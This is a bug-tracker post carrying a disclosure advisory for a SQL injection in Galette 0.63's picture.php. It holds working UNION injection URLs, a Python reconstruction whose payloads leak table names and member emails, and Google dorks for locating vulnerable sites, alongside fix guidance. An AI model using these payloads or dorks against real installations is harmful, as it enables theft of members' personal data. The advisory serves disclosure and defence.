Anomalie #250

Updated by Johan Cwiklinski over 12 years ago

Hi developers, 

I've discovered a SQL injection in the Galette software on the 0.63 branch, and it seems not to be fixed according to the ChangeLog here [1]. The advisory is below:

 h2. Affected versions 

It seems only the versions listed here are vulnerable:

 * 0.63 
 * 0.63.1 
 * 0.63.2 
 * 0.63.3 
 * 0.64rc1 

 h2. Vulnerability 

The vulnerability is located in file *includes/picture.class.php* at L.71-73 (cf. [2]), where the request value is concatenated directly into the query text:

 <pre lang="php"> 
  ... 
          $sql = "SELECT picture,format 
                  FROM ".PREFIX_DB."pictures 
                  WHERE id_adh=".$id_adh; 
  ... 
 </pre> 

$id_adh is an input controlled by the user in file *picture.php* and is *not* filtered at L.35-36 (cf. [3]):

 <pre lang="php"> 
  ... 
  else 
            $id_adh = $_GET['id_adh']; 
  ... 
 </pre> 

 h2. Exploitation 

The queries below exploit the SQL injection to leak data from the database and the server configuration on a fresh Galette installation. The leading `0 and 1=0` empties the legitimate SELECT so that only the UNIONed row is returned, and `,null` pads the injected SELECT to the two columns (picture, format) of the original query.

- Leak the MySQL version

 <pre> 
 /picture.php?id_adh=0+and+1=0+union+select+@@version,null 
 </pre> 

- Leak table names on MySQL 5.x (group_concat truncates the output here, at group_concat_max_len, 1024 bytes by default)

 <pre> 
 /picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables 
 </pre> 

I don't want to show too many exploitable queries to avoid their use by script kiddies, but it is possible to inject more elaborate queries in order to leak members' data.
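As an added example that is not part of the original report or of Galette's code, the vulnerable query pattern and the advisory's payloads are rebuilt below in Python against an in-memory SQLite database so they run offline. `sqlite_version()` and `sqlite_master` stand in for MySQL's `@@version` and `information_schema.tables`; the `galette_` table prefix and the sample rows are constructed; and the hardened variant shows the fix (integer check plus a bound parameter).

```python
import sqlite3

# Constructed stand-in for Galette's PREFIX_DB constant.
PREFIX_DB = "galette_"


def make_db():
    """Build a small in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX_DB}pictures (id_adh INTEGER, picture BLOB, format TEXT)")
    conn.execute(f"CREATE TABLE {PREFIX_DB}adherents (id_adh INTEGER, nom TEXT, email TEXT)")
    conn.execute(f"INSERT INTO {PREFIX_DB}pictures VALUES (1, X'89504E47', 'png')")
    conn.execute(f"INSERT INTO {PREFIX_DB}adherents VALUES (1, 'Dupont', 'dupont@example.org')")
    conn.commit()
    return conn


def db_version(conn):
    """What a legitimate query would report as the engine version."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def vulnerable_picture(conn, id_adh):
    """Same shape as picture.class.php L.71-73: the request value is pasted into the SQL text."""
    sql = f"SELECT picture,format FROM {PREFIX_DB}pictures WHERE id_adh={id_adh}"
    return conn.execute(sql).fetchone()


def hardened_picture(conn, id_adh):
    """Reject anything that is not an integer, then bind it as a parameter.
    The value never becomes part of the SQL text, so no UNION can be appended."""
    try:
        id_adh = int(id_adh)
    except (TypeError, ValueError):
        raise ValueError("id_adh must be an integer")
    sql = f"SELECT picture,format FROM {PREFIX_DB}pictures WHERE id_adh=?"
    return conn.execute(sql, (id_adh,)).fetchone()


def hardened_rejects(conn, value):
    """True if the hardened lookup refuses the value instead of running it."""
    try:
        hardened_picture(conn, value)
    except ValueError:
        return True
    return False


# The advisory's payloads, with SQLite equivalents of the MySQL functions:
# "0 and 1=0" empties the legitimate SELECT so only the UNIONed row comes back,
# and ",null" pads the injected SELECT to the two columns of the original.
PAYLOADS = {
    "version": "0 and 1=0 union select sqlite_version(),null",
    "tables": "0 and 1=0 union select group_concat(name,char(10)),null from sqlite_master",
    "members": f"0 and 1=0 union select nom||':'||email,null from {PREFIX_DB}adherents",
}


def run_payloads(conn):
    """Return what each payload leaks through the vulnerable function (first column only)."""
    return {name: vulnerable_picture(conn, payload)[0] for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    db = make_db()
    for name, leaked in run_payloads(db).items():
        print(f"{name}: {leaked!r}")
    print("hardened rejects payload:", hardened_rejects(db, PAYLOADS["version"]))
    print("hardened legitimate lookup:", hardened_picture(db, "1"))
```

Run it directly to see each payload's leaked first column. The PHP fix is the same idea: cast `$_GET['id_adh']` with `intval()` or `(int)` before building the query, or better, use a prepared statement so the value is bound rather than concatenated.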

h2. Impact of the vulnerability

Galette is a well-known membership management web application used by many associations (especially French ones); it is possible to look for vulnerable targets using the Google dorks below:

 * inurl:self_adherent.php intitle:"Galette v0.63" 
 * inurl:self_adherent.php intitle:Galette 

The impact is a leak of database contents on any vulnerable Galette installation.

 h2. Mitigation of the vulnerability 

Update to a 0.7.x version.

 h2. Discovered by 

 Sofian Brabez <sbz@nbs-system.com> 

 h2. Timeline 

* 09/05/2012: Contacted vendor through the bug tracker on redmine.ulysses.fr

 h2. References 

 [1] http://galette.tuxfamily.org//documentation/fr/changelog.html 
 [2] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/includes/picture.class.php?revision=826&view=markup 
     http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=includes/picture.class.php;h=9c4985eeb37369c9b64af6e11e6840645474fb2c;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l70 
 [3] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/picture.php?revision=825&view=markup 
     http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=picture.php;h=8ec80ab9f67b66f2fced141d9512332cf64f334e;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l35 
